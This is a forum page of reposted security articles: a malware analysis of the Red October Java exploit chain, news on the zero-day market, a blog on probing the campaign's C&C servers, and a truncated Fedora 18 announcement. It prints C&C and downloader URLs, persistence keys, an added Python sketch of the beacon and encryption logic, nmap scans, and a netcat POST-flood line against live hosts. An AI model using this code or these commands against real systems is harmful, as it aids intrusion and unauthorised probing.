Everything posted by Nytro

  1. Red October - Java Exploit Delivery Vector Analysis

GReAT, Kaspersky Lab Expert
Posted January 16, 13:00 GMT

Since the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage of another delivery vector in the Red October attacks. In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers also infiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - 'NewsFinder.jar'), known as the 'Rhino' exploit (CVE-2011-3544).

We know they would have used this technique in the early February 2012 timeframe, and this exploit use is consistent with their approach in that it's not 0-day. Most likely, a link to the site was emailed to potential victims, and the victim systems were running an outdated version of Java.

However, it seems that this vector was not heavily used by the group. When we downloaded the PHP script responsible for serving the '.jar' malcode archive, the line of code delivering the Java exploit was commented out. Also, the related links, Java code, and the executable payload are proving difficult to track down to this point.

The domain involved in the attack appears only once in a public sandbox at malwr.com (Malwr - Analysis of c3b0d1403ba35c3aba8f4529f43fb300), and only on February 14th, the very same day that they registered the domain hotinfonews.com:

[COLOR=#1f497d]Domain Name: HOTINFONEWS.COM
Registrant:
Privat Person
Denis Gozolov (gozolov@mail.ru)
Narva mnt 27
Tallinn
Tallinn, 10120
EE
Tel. +372.54055298
Creation Date: 14-Feb-2012
Expiration Date: 14-Feb-2013[/COLOR]

Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike the many other Red October components. We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days, then didn't need the effort any longer.
Which may also tell us that this group, which meticulously adapted and developed their infiltration and collection toolset to their victims' environment, had a need to shift to Java from their usual spearphishing techniques in early February 2012. And then they went back to their spearphishing.

Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connecting with a governmental economic research institute in the Middle East. So, this Java Rhino exploit appears to be of limited use.

And the functionality embedded in the server-side PHP script that delivers this file is very different from the common and related functionality that we see in the backdoors used throughout the five-year campaign. The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt the URL strings within the exploit is delivered within the Java applet itself.

Here is the PHP encryption routine used to encrypt the URL for the downloader content:

And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter 'p':

Here is the code within the applet that consumes the encrypted strings and uses them. The resulting functionality downloads the file from the URL and writes it to 'javaln.exe'. Notice that the strb and stra variables maintain the same strings as the $files and $charset variables in the PHP script:

This "transfer" decryption routine returns a URL that is concatenated with the other variables, resulting in "hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win". It is this content that is written to disk and executed on the victim's machine. A description of that downloader follows.

It is most interesting that this exploit/PHP combination's encryption routine is different from the obfuscation commonly used throughout Red October modules.
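The code screenshots from the original report did not survive this repost, but the scheme described above — an encrypted URL string passed to the applet via parameter 'p', with the decryption key shipped inside the applet itself — can be sketched roughly as follows. The actual Red October cipher is not reproduced here; a simple repeating-key XOR stands in purely for illustration, and the key value and function names are hypothetical.

```python
# Illustrative sketch only: the real Red October "transfer" routine is not
# public here. A repeating-key XOR stands in for the cipher; the key travels
# with the applet, mirroring the key-delivered-with-payload scheme described
# in the article. The key and names below are hypothetical.
import binascii

APPLET_KEY = b"hypothetical-key"  # embedded in the applet, not a real sample value

def encrypt_url(url: str, key: bytes = APPLET_KEY) -> str:
    """PHP-side stand-in: encrypt the URL before embedding it as parameter 'p'."""
    data = url.encode()
    out = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
    return binascii.hexlify(out).decode()

def decrypt_param(p: str, key: bytes = APPLET_KEY) -> str:
    """Applet-side stand-in: recover the URL from parameter 'p'."""
    data = binascii.unhexlify(p)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).decode()

if __name__ == "__main__":
    # The decrypted string is then concatenated with other applet variables,
    # yielding the final downloader URL noted in the article.
    p = encrypt_url("http://www.hotinfonews.com/news/dailynews2.php")
    print(decrypt_param(p) + "?id=&t=win")
```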
It further suggests that this limited-use package was potentially developed separately from the rest, for a specific target.

2nd stage of the attack: EXE, downloader

The second stage of the attack is downloaded from "http://www.hotinfonews.com/news/dailynews2.php" and executed by the payload of the Java exploit. It acts as a downloader for the next stage of the attack.

Known file location: %TEMP%\javaln.exe
MD5: c3b0d1403ba35c3aba8f4529f43fb300

The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscation layer, the same as used in many Red October modules.

Obfuscation layer disassembled

The module creates a mutex named "MtxJavaUpdateSln" and exits if it already exists. After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically on startup:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
JavaUpdateSln=%full path to own executable%

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
JavaUpdateSln=%full path to own executable%

Then, after a 49-second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds it sends an HTTP POST request to the following sites:

www.microsoft.com
update.microsoft.com
www.google.com

Once a valid connection is established, it continues to its main loop.

C&C server connection loop

Every 180 seconds the module sends an HTTP POST request to its C&C server.
The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.php

The contents of the POST request take the following format:

id=%unique user ID, retrieved from the overlay of the file%&
A=%integer, indicates whether the autorun registry key was written%&
B=%0 or 1, indicates if user has administrative rights%&
C=%integer, level of privilege assigned to the current user%

[TABLE=width: 100%]
[TR]
[TD=align: left]00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.|
00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne|
00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas|
00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H|
00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin|
00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C|
00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6|
00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:|
00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w|
00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod|
000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395|
000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026|
000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB|
000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1|
000000e0 26 43 3d 32 |&C=2|[/TD]
[/TR]
[/TABLE]

HTTP POST request sent to the C&C server

The module decrypts the C&C response with the AMPRNG algorithm using a hardcoded key. Then it checks whether there is a valid EXE signature ("MZ") at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to "%TEMP%\nvsvc%p%p.exe" (%p depends on system time) and executes it.
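The beacon format and response check described above can be sketched in a few lines. The id/A/B/C field names and the hardcoded URL come from the analysis; the AMPRNG cipher is not reproduced here, so this operates on an already-decrypted buffer, and the helper names are my own.

```python
# Sketch of the javaln.exe beacon format and response handling described in
# the analysis. The AMPRNG decryption step is stubbed out; extract_payload
# operates on the already-decrypted buffer.
from typing import Optional
from urllib.parse import urlencode

BEACON_URL = "http://www.dailyinfonews.net:80/reportdatas.php"

def build_beacon(user_id: str, autorun_written: int, is_admin: int, priv_level: int) -> str:
    """Reproduce the POST body layout: id=...&A=...&B=...&C=..."""
    return urlencode({"id": user_id, "A": autorun_written, "B": is_admin, "C": priv_level})

def extract_payload(decrypted: bytes) -> Optional[bytes]:
    """The module checks for an 'MZ' EXE signature at offset 37 of the
    decrypted C&C response; only then is the payload written to %TEMP%."""
    if len(decrypted) > 39 and decrypted[37:39] == b"MZ":
        return decrypted[37:]
    return None

if __name__ == "__main__":
    # Field values mirror the hexdump above; the id is a placeholder.
    print(build_beacon("AAAexampleid", 1, 1, 2))  # id=AAAexampleid&A=1&B=1&C=2
```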
3rd stage of the attack: EXE, unknown

Currently, the C&C server is unavailable and we do not have the executables that were served to the "javaln.exe" downloader. Most likely, they were the actual droppers, similar to the ones used with the Word and Excel exploits.

Conclusions

As more information about Red October becomes available and third parties publish their own research into the attacks, it becomes clear that the scope of the operation is bigger than originally thought. In addition to the Java exploit presented here, it's possible that other delivery mechanisms were used during the 5 years this gang was active. For instance, we haven't seen any PDF exploits yet, which are very popular with other groups - an unusual thing. We will continue to monitor the situation and publish updates as the story unfolds.

Sursa: Red October - Java Exploit Delivery Vector Analysis - Securelist
  2. Security audit finds dev OUTSOURCED his JOB to China to goof off at work

Cunning scheme netted him 'best in company' awards

By Iain Thomson in San Francisco
Posted in Business, 16th January 2013

A security audit of a US critical infrastructure company last year revealed that its star developer had outsourced his own job to a Chinese subcontractor and was spending all his work time playing around on the internet.

The firm's telecommunications supplier Verizon was called in after the company set up a basic VPN system with two-factor authentication so staff could work at home. The VPN traffic logs showed a regular series of logins to the company's main server from Shenyang, China, using the credentials of the firm's top programmer, "Bob".

"The company's IT personnel were sure that the issue had to do with some kind of zero day malware that was able to initiate VPN connections from Bob's desktop workstation via external proxy and then route that VPN traffic to China, only to be routed back to their concentrator," said Verizon. "Yes, it is a bit of a convoluted theory, and like most convoluted theories, an incorrect one."

After getting permission to study Bob's computer habits, Verizon investigators found that he had hired a software consultancy in Shenyang to do his programming work for him, and had FedExed them his two-factor authentication token so they could log into his account. He was paying them a fifth of his six-figure salary to do the work and spent the rest of his time on other activities. The analysis of his workstation found hundreds of PDF invoices from the Chinese contractors and determined that Bob's typical work day consisted of:

9:00 a.m. – Arrive and surf Reddit for a couple of hours. Watch cat videos
11:30 a.m. – Take lunch
1:00 p.m. – Ebay time
2:00-ish p.m. – Facebook updates, LinkedIn
4:30 p.m. – End-of-day update e-mail to management
5:00 p.m. – Go home

The scheme worked very well for Bob.
In his performance assessments by the firm's human resources department, he was the firm's top coder for many quarters and was considered expert in C, C++, Perl, Java, Ruby, PHP, and Python. Further investigation found that the enterprising Bob had actually taken jobs with other firms and had outsourced that work too, netting him hundreds of thousands of dollars in profit as well as lots of time to hang around on internet messaging boards and checking for a new . Bob is no longer employed by the firm. ®

Sursa: Security audit finds dev OUTSOURCED his JOB to China to goof off at work • The Register

Clever guy.
  3. [h=2]Cyberwar’s Gray Market[/h][h=1]Should the secretive hacker zero-day exploit market be regulated?[/h]

By Ryan Gallagher | Posted Wednesday, Jan. 16, 2013

Behind computer screens from France to Fort Worth, Texas, elite hackers hunt for security vulnerabilities worth thousands of dollars on a secretive unregulated marketplace. Using sophisticated techniques to detect weaknesses in widely used programs like Google Chrome, Java, and Flash, they spend hours crafting “zero-day exploits”—complex codes custom-made to target a software flaw that has not been publicly disclosed, so they can bypass anti-virus or firewall detection to help infiltrate a computer system.

Like most technologies, the exploits have a dual use. They can be used as part of research efforts to help strengthen computers against intrusion. But they can also be weaponized and deployed aggressively for everything from government spying and corporate espionage to flat-out fraud. Now, as cyberwar escalates across the globe, there are fears that the burgeoning trade in finding and selling exploits is spiralling out of control—spurring calls for new laws to rein in the murky trade.

Some legitimate companies operate in a legal gray zone within the zero-day market, selling exploits to governments and law enforcement agencies in countries across the world. Authorities can use them covertly in surveillance operations or as part of cybersecurity or espionage missions. But because sales are unregulated, there are concerns that some gray market companies are supplying to rogue foreign regimes that may use exploits as part of malicious targeted attacks against other countries or opponents. There is also an anarchic black market that exists on invite-only Web forums, where exploits are sold to a variety of actors—often for criminal purposes.

The importance of zero-day exploits, particularly to governments, has become increasingly apparent in recent years.
Undisclosed vulnerabilities in Windows played a crucial role in how Iranian computers were infiltrated for surveillance and sabotage when the country’s nuclear program was attacked by the Stuxnet virus (an assault reportedly launched by the United States and Israel). Last year, at least eight zero days in programs like Flash and Internet Explorer were discovered and linked to a Chinese hacker group dubbed the “Elderwood gang,” which targeted more than 1,000 computers belonging to corporations and human rights groups as part of a shady intelligence-gathering effort allegedly sponsored by China. The most lucrative zero days can be worth hundreds of thousands of dollars in both the black and gray markets. Documents released by Anonymous in 2011 revealed Atlanta-based security firm Endgame Systems offering to sell 25 exploits for $2.5 million. Emails published alongside the documents showed the firm was trying to keep “a very low profile” due to “feedback we've received from our government clients.” (In keeping with that policy, Endgame didn’t respond to questions for this story.) But not everyone working in the business of selling software exploits is trying to fly under the radar—and some have decided to blow the whistle on what they see as dangerous and irresponsible behavior within their secretive profession. Adriel Desautels, for one, has chosen to speak out. The 36-year-old “exploit broker” from Boston runs a company called Netragard, which buys and sells zero days to organizations in the public and private sectors. (He won’t name names, citing confidentiality agreements.) The lowest-priced exploit that Desautels says he has sold commanded $16,000; the highest, more than $250,000. Unlike other companies and sole traders operating in the zero-day trade, Desautels has adopted a policy to sell his exploits only domestically within the United States, rigorously vetting all those he deals with. 
If he didn’t have this principle, he says, he could sell to anyone he wanted—even Iran or China—because the field is unregulated. And that’s exactly why he is concerned. “As technology advances, the effect that zero-day exploits will have is going to become more physical and more real,” he says. “The software becomes a weapon. And if you don’t have controls and regulations around weapons, you’re really open to introducing chaos and problems.” Desautels says he knows of “greedy and irresponsible” people who “will sell to anybody,” to the extent that some exploits might be sold by the same hacker or broker to two separate governments not on friendly terms. This can feasibly lead to these countries unwittingly targeting each other’s computer networks with the same exploit, purchased from the same seller. “If I take a gun and ship it overseas to some guy in the Middle East and he uses it to go after American troops—it’s the same concept,” he says. The position Desautels has taken casts him as something of an outsider within his trade. France’s Vupen, one of the foremost gray-market zero-day sellers, takes a starkly different approach. Vupen develops and sells exploits to law enforcement and intelligence agencies across the world to help them intercept communications and conduct “offensive cyber security missions,” using what it describes as “extremely sophisticated codes” that “bypass all modern security protections and exploit mitigation technologies.” Vupen’s latest financial accounts show it reported revenue of about $1.2 million in 2011, an overwhelming majority of which (86 percent) was generated from exports outside France. Vupen says it will sell exploits to a list of more than 60 countries that are members or partners of NATO, provided these countries are not subject to any export sanctions. 
(This means Iran, North Korea, and Zimbabwe are blacklisted—but the likes of Kazakhstan, Bahrain, Morocco, and Russia are, in theory at least, prospective customers, as they are not subject to any sanctions at this time.) “As a European company, we exclusively work with our allies and partners to help them protect their democracies and citizens against threats and criminals,” says Chaouki Bekrar, Vupen’s CEO, in an email. He adds that even if a given country is not on a sanctions list, it doesn’t mean Vupen will automatically work with it, though he declines to name specific countries or continents where his firm does or does not have customers. Vupen’s policy of selling to a broad range of countries has attracted much controversy, sparking furious debate around zero-day sales, ethics, and the law. Chris Soghoian of the ACLU—a prominent privacy and security researcher who regularly spars with Vupen CEO Bekrar on Twitter—has accused Vupen of being “modern-day merchants of death” selling “the bullets for cyberwar.” “Just as the engines on an airplane enable the military to deliver a bomb that kills people, so too can a zero day be used to deliver a cyberweapon that causes physical harm or loss of life,” Soghoian says in an email. He is astounded that governments are “sitting on flaws” by purchasing zero-day exploits and keeping them secret. This ultimately entails “exposing their own citizens to espionage,” he says, because it means that the government knows about software vulnerabilities but is not telling the public about them. Some claim, however, that the zero-day issue is being overblown and politicized. “You don’t need a zero day to compromise the workstation of an executive, let alone an activist,” says Wim Remes, a security expert who manages information security for Ernst & Young. Others argue that the U.S. government in particular needs to purchase exploits to keep pace with what adversaries like China and Iran are doing. 
“If we’re going to have a military to defend ourselves, why would you disarm our military?” says Robert Graham at the Atlanta-based firm Errata Security. “If the government can’t buy exploits on the open market, they will just develop them themselves,” Graham says. He also fears that regulation of zero-day sales could lead to a crackdown on legitimate coding work. “Plus, digital arms don’t exist—it’s an analogy. They don’t kill people. Bad things really don’t happen with them.” * * * So are zero days really a danger? The overwhelming majority of compromises of computer systems happen because users failed to update software and patch vulnerabilities that are already known about. However, there are a handful of cases in which undisclosed vulnerabilities—that is, zero days—have been used to target organizations or individuals. It was a zero day, for instance, that was recently used by malicious hackers to compromise Microsoft’s Hotmail and steal emails and details of the victims' contacts. Last year, it was reported that a zero day was used to target a flaw in Internet Explorer and hijack Gmail accounts. Noted “offensive security” companies such as Italy’s Hacking Team and the England-based Gamma Group are among those to make use of zero-day exploits to help law enforcement agencies install advanced spyware on target computers—and both of these companies have been accused of supplying their technologies to countries with an authoritarian bent. Tracking and communications interception can have serious real-world consequences for dissidents in places like Iran, Syria, or the United Arab Emirates. In the wrong hands, it seems clear, zero days could do damage. 
This potential has been recognized in Europe, where Dutch politician Marietje Schaake has been crusading for groundbreaking new laws to curb the trade in what she calls “digital weapons.” Speaking on the phone from Strasbourg, France, Schaake tells me she’s concerned about security exploits, particularly where they are being sold with the intent to help enable access to computers or mobile devices not authorized by the owner. She adds that she is considering pressing for the European Commission, the EU’s executive body, to bring in a whole new regulatory framework that would encompass the trade in zero days, perhaps by looking at incentives for companies or hackers to report vulnerabilities that they find.

Such a move would likely be welcomed by the handful of organizations already working to encourage hackers and security researchers to responsibly disclose vulnerabilities they find instead of selling them on the black or gray markets. The Zero Day Initiative, based in Austin, Texas, has a team of about 2,700 researchers globally who submit vulnerabilities that are then passed on to software developers so they can be fixed. ZDI, operated by Hewlett-Packard, runs competitions in which hackers can compete for a pot of more than $100,000 in prize funds if they expose flaws. “We believe our program is focused on the greater good,” says Brian Gorenc, a senior security researcher who works with the ZDI.

Yet for some hackers, disclosing vulnerabilities directly to developers lacks appeal because greater profits can usually be made elsewhere.
When I ask Vupen’s Bekrar what he thinks of responsible disclosure programs, he is critical of “lame” rewards on offer and predicts that for this reason an increasing number of skilled hackers in the future will “keep their research private to sell it to governments.” It may also be the case that, no matter what the financial incentive, for some it will always be more of a thrill to shun the “responsible.” So even if regulators internationally were to somehow curb exploit sales, it’s likely it would only have a tangible impact on legitimate companies like Vupen, Endgame, Netragard, and others. There would remain a burgeoning black market, in which vulnerabilities are sold off to the highest bidder. This market exists in an anarchic pocket of the Internet, a sort of Wild West, where legality is rarely of paramount importance—as former Washington Post reporter Brian Krebs recently found out for himself. Krebs, who regularly publishes scoops about zero days on his popular blog, has on several occasions been besieged by hackers after writing about vulnerabilities circulating on the black market. Krebs says his website came under attack last year after he exposed a zero day that was being sold on an exclusive, invite-only Web forum. “They don’t like the attention,” he says. The hackers were able to find Krebs’ home IP address. Then, they began targeting his Internet connection and taunting him. Krebs was eventually forced to change his router and has since signed up for a service that helps protect his online identity. But he says he still receives malware by email “all the time.” It’s difficult to imagine how the aggressive black market that Krebs encountered could ever be efficiently curtailed by laws. That is why the best way for vulnerabilities to be fully eliminated—or at least drastically reduced—would perhaps be to place a greater burden on the software developers to raise standards. 
If only developers would invest more in protecting user security by designing better, safer software and by swiftly patching security flaws, the zero-day marketplace would likely be hit by a crushing recession. At present, however, that remains an unlikely prospect. And unfortunately it seems there’s not a great deal you can do about it, other than to be aware of the risk. “Most organizations are one zero day away from compromise,” Krebs says. “If it’s a widely used piece of software, you’ve just got to assume these days that it’s got vulnerabilities that the software vendors don’t know about—but the bad guys do.” This article arises from Future Tense, a collaboration among Arizona State University, the New America Foundation, and Slate. Future Tense explores the ways emerging technologies affect society, policy, and culture. To read more, visit the Future Tense blog and the Future Tense home page. You can also follow us on Twitter. Sursa: Zero-day exploits: Should the hacker gray market be regulated? - Slate Magazine
  4. The Hunt For Red October

Posted on January 14, 2013 by infodox

The Hunt For Red October – The Job So Far

Today, Kaspersky Labs released a report on a long running advanced persistent threat* (APT) they had uncovered, revealing a long running cyber-espionage campaign targeting a broad and diverse mixture of both countries and sectors. As usual the fingers were pointed at China (Chinese exploit chains, Chinese hosts used…), however, there was also some evidence to implicate Russian involvement, which was speculated to be a “False Flag” attempt.

An associate of mine, after reading the report, came up with a SHODAN dork rather quickly to identify the C&C hosts.

http://www.shodanhq.com/search?q=Last-Modified%3A+%27Tue%2C+21+Feb+2012+09%3A00%3A41+GMT%27+Apache

After a few seconds, he realized that the etag header on all of them was the same, leading to the following query:

http://www.shodanhq.com/?q=8c0bf6-ba-4b975a53906e4

So, fingerprinting information: just check for etag = 8c0bf6-ba-4b975a53906e4

The “offending IPs” are as follows; it appears these are used as proxies.

31.41.45.119
37.235.54.48
188.40.19.244
141.101.239.225
46.30.41.112
188.72.218.213
31.41.45.9

So, we now have a list of 7 C&C hosts. Time to break out nmap and see what they are doing. The following scan string was used for an initial scan of all the hosts:

sudo nmap -sSUV -A -O -vvv -oA huntingredoctober 31.41.45.119 37.235.54.48 188.40.19.244 141.101.239.225 46.30.41.112 188.72.218.213 31.41.45.9

The tarball of report files is available here: huntingredoctober.tar

The hosts identified as alive are as follows:

37.235.54.48
188.40.19.244
31.41.45.119

The other four were not responsive, probably taken down already. No fun.

Once I had identified which hosts were, in fact, still alive (while the rest of the bloody slow scan was running), I decided to see what lay behind the scenes on these hosts, doing the “daft” thing of connecting to port 80 using my web browser.
The clench factor was rather intense as I half expected to be owned by about half a dozen super 0day exploits on crack while doing so. Instead, I was redirected harmlessly to the BBC. The following HTML code was responsible for this redirect, which I thought was an incredibly clever way to hide their true purpose.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>BBC – Homepage</title>
<meta http-equiv="REFRESH" content="0;url=http://www.bbc.com/"></HEAD>
</HTML>

Back to the nmap scan (it had FINALLY completed), the following was very interesting.

PORT    STATE         SERVICE      VERSION
80/tcp  open          http?
|_http-title: BBC – Homepage
| http-methods: GET HEAD POST OPTIONS TRACE
| Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
138/udp open|filtered netbios-dgm
520/udp filtered      route

All of the servers looked like this. They all had those three ports – 80, 138, 520 – open or filtered. The rest were all closed. The 188.40.19.244 host began sending me RST packets midway through my scan, but regardless, the work went on.

I decided I was going to look at the webserver using the information Kaspersky published. Sending GET requests to the /cgi-bin/ms/check CGI script produced a 500 internal server error, as did other CGI scripts. This was interesting in that they told me to email eaxample@example.com about it. I did so immediately, being a good netizen. Note the misspelling of example – “eaxample”.

Emailing the big heckers. The email delivered.

Apparently the mail was delivered successfully, so I hope they reply soon with an explanation. On to more serious things: another analyst working with me uncovered another interesting thing. He went and did the following:

printf "POST /cgi-bin/nt/th HTTP/1.1\r\nHost: 37.235.54.48\r\nContent-Length: 10000\r\n\r\n%s" `perl -e 'print "A" x 20000'` | torsocks nc 37.235.54.48 80

Now, he had figured out the page would 500 unless a Content-Length was set.
So, he set a long Content-Length, and sent an even longer POST request. The result was nothing short of fascinating.

HTTP/1.1 200 OK
Date: Mon, 14 Jan 2013 19:18:07 GMT
Server: Apache
Content-length: 0
Content-Type: text/html

HTTP/1.1 414 Request-URI Too Large
Date: Mon, 14 Jan 2013 19:18:08 GMT
Server: Apache
Content-Length: 250
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>414 Request-URI Too Large</title>
</head><body>
<h1>Request-URI Too Large</h1>
<p>The requested URL's length exceeds the capacity limit for this server.<br />
</p>
</body></html>

“Look mom! Two headers!” Seriously, this is interesting. First it gives a 200 OK, then a second later something else says “LOL, NO”. The delay makes us think the proxy is saying “OK”, then the real C&C is complaining. The fact that it complains about a request URI, with the length being in the POST request, makes me think the final data-to-C&C might be sent as a GET. Just a theory.

— TO BE CONTINUED —

// This post suffered a bad case of myself and fellow researchers having a lulz about it, and my cat straying onto my keyboard. It is a work in progress.

— Continuing the hunt —

Today we retrieved new intelligence (or rather, last night, but I could not act on this intel) from HD Moore of the Metasploit project that more C&C servers had been located. The following link is the list of IP addresses:

http://pastie.org/private/ytbrfmqpn8alfjfrnbhcbw

So, it was decided (once the cat had gotten the hell off my keyboard) to investigate this list. @craiu provided us with the tip “check out "1c824e-ba-4bcd8c8b36340" and "186-1333538825000" too”, so we will act upon this later.

I decided, seeing as my internet went down for a while, to test out my Python skillz, and whipped up a quick program I named “SONAR”, which simply attempted a TCP connection to port 80 on the suspected C&C servers and logged responsive ones to a file. Source code attached.
sonar.tar

Sonar...

I could have used nmap, but that would have been unimaginative and, frankly, no fun. And who says hunting cyber-spies (so much worse than normal spies, ‘cos they got the dreaded CYBER in there) is not supposed to be bloody fun anyway? Not me, for certain!

We quickly reduced the list to “a lot less than we had”, and I queued them up for nmap scanning, which has yet to be done, as the sysadmins on the network I am using do not like when I portscan things for some odd reason. Or when I use SSH, or email. Anyway, I digress.

So far, more C&C servers had been identified, and more “fingerprinting” methods had been developed. I am considering writing a patch to sonar.py to dump out the etag data along with working IPs, but that can wait till later. A simple HTTP GET / should do the trick, with a few regexes.

We also obtained a list of MD5 hashes from malware.lu showing samples of Red October they have in their repo – see here -> 053d92ba6413ea31af9898e7d57692b68e42117a61b2d6de4556e9b707314fd7 16d5114b8613f9 - Pastebin.com – so those were queued up for downloading (once on a network not monitored by the college) for some analysis using IDA. That is tonight's job – a quick and dirty first-pass run of analysing these things.

* For the record, I think APT is another FUD term… But oh well, it has become “a thing”.

Sursa: The Hunt For Red October | Insecurety Research
5. Fedora 18 released

From: Robyn Bergeron <rbergero-AT-redhat.com>
To: announce-AT-lists.fedoraproject.org
Subject: Announcing the release of Fedora 18.
Date: Tue, 15 Jan 2013 10:03:18 -0500 (EST)

The Fedora Project is incredibly delighted to announce the release of Fedora 18 ("Spherical Cow"). Heck, we'd even say that getting this release to you has been a mooving experience. Fedora is a leading-edge, free and open source operating system that continues to deliver innovative features to many users, with a new release about every six months...or so. But no bull: Spherical Cow is, of course, Fedora's best release yet. You'll go through the hoof when you hear about the Grade A Prime F18 features. You can always cownt on us to bring you the best features first. Can't wait for a taste? You can get started downloading now:

http://fedoraproject.org/get-fedora

Detailed information about this release can be seen in the release notes:

http://docs.fedoraproject.org/en-US/Fedora/18/html/Releas...

== What's New in Fedora 18? ==

The Fedora Project takes great pride in being able to show off features for all types of use cases, including traditional desktop users, systems administration, development, the cloud, and many more. But a few new features are guaranteed to be seen by nearly anyone installing Fedora and are improvements that deserve to be called out on their own.

The user interface for Fedora's installation software, Anaconda, has been completely re-written from the ground up. Making its debut in Fedora 18, the new UI introduces major improvements to the installation experience. It uses a hub-and-spoke model that makes installation easier for new users, offering them concise explanations about their choices.
Advanced users and system administrators are of course still able to take advantage of more complex options. The general look and feel of the installation experience has been vastly upgraded, providing modern, clean, and comprehensible visuals during the process. While the new installer should work well for most users in most configurations, there are inevitably a few teething problems in the first release of such a major revision. Known design limitations of the new installer in F18 are listed here: http://fedoraproject.org/wiki/Anaconda/NewInstaller Known significant bugs can be seen here: http://fedoraproject.org/wiki/Common_F18_bugs#Installatio... We welcome your constructive and specific feedback as we continue to work on refining the installer for future releases. The upgrade process for Fedora now uses a new tool called FedUp (Fedora Upgrader). FedUp replaces pre-upgrade as well as the DVD methods for upgrading that have been used in previous Fedora releases. FedUp integrates with systemd to enable the upgrade functionality, doing the work in a pristine boot environment. Of course, it wouldn't be a release announcement without a spotted -- er, dotted -- list of all the other fantastic features you'll see in Fedora 18: === For desktop users === Moooove over, stale desktops. We've got a small herd of choices udderly suited to your preferences. * GNOME 3.6: The newest version of the GNOME desktop provides an enhanced Messaging Tray, support for Microsoft Exchange and Skydrive, and many more new features. * Cinnamon: Fedora users now have the option of using Cinnamon, an advanced desktop environment based on GNOME 3. Cinnamon takes advantage of advanced features provided by the GNOME backend while providing users with a more traditional desktop experience. * MATE Desktop: The MATE desktop provides users with a classic GNOME 2.x style user interface. 
This desktop is perfect for users who have been running GNOME Classic or other window managers like XFCE as an alternative to GNOME 3. * KDE Plasma Workspaces 4.9: KDE Plasma Workspaces has been updated with many new features and improved stability and performance, including updates to the Dolphin File Manager, Konsole, and KWin Window manager. * Xfce 4.10: The lightweight and easy-to-use Xfce desktop has been updated to the 4.10 version with many bug fixes and enhancements, including a new MIME type editor, a reworked xfce4-run dialog, improved mouse settings, tabs in the Thunar file manager, and options to tile windows in xfwm4. Through all of these and more, Xfce continues to improve without getting in your way. Regardless of your desktop choice, Fedora 18 offers... * Improved storage management: SSM (System Storage Manager) is an easy-to-use command-line interface tool that presents a unified view of storage management tools. Devices, storage pools, volumes, and snapshots can now be managed with one tool, with the same syntax for managing all of your storage. (It's great for systems administrators, too!) === For developers === For developers there are all sorts of moo-tivating goodies: * Fresh versions of programming languages: Using Perl, Rails, or Python? All three of these languages are updated in Fedora 18. We've got Rails 3.2, Python 3.3, and Perl 5.16 fresh off the farm. * Clojure gets more love with the addition of tooling packages, including the Leinengen build tool, as well as Clojure libraries and frameworks, including Korma and Noir. * DragonEgg connects GCC and LLVM: DragonEgg is a plugin for the GCC compilers to allow use of the LLVM optimization and code-generation framework. DragonEgg provides software developers with more optimization and code-generation options for use with the GCC compilers. 
DragonEgg also allows GCC to be used for cross-compilation to target architectures supported by LLVM without requiring any special cross-compilation compiler packages. Fedora continues to develop and use GCC as the standard default compiler. === For systems administrators === Keep track of your infrastructure herds with these new features: * Offline system updates: Systems can now be updated offline, allowing for a more stable update of critical system components. This functionality is only integrated with GNOME Desktop Environment in this release but uses the distribution neutral PackageKit and systemd API's and hence can be made available for other desktop environments as well based on the interest from upstream developers. * Storage enhancements: StorageManagement is a collection of tools and libraries for managing storage area networks (SAN) and network attached storage (NAS). * Samba 4: This popular suite of tools has long provided file- and print-sharing services in heterogeneous operating system environments. The long-awaited Samba 4 introduces the first free and open source implementation of Active Directory protocols and includes a new scripting interface, allowing Python programs to interface to Samba's internals. * Riak: A fault-tolerant key-value store, Riak provides easy operations and predictable scaling as a NoSQL database. === For clouds and virtualization === Do you spend your days <strike>grazing</strike> gazing into the clouds? Here's just a taste of some of the cloud and virt features you'll see in Fedora 18: * Eucalyptus makes its first appearance in Fedora, with their 3.2 release included in 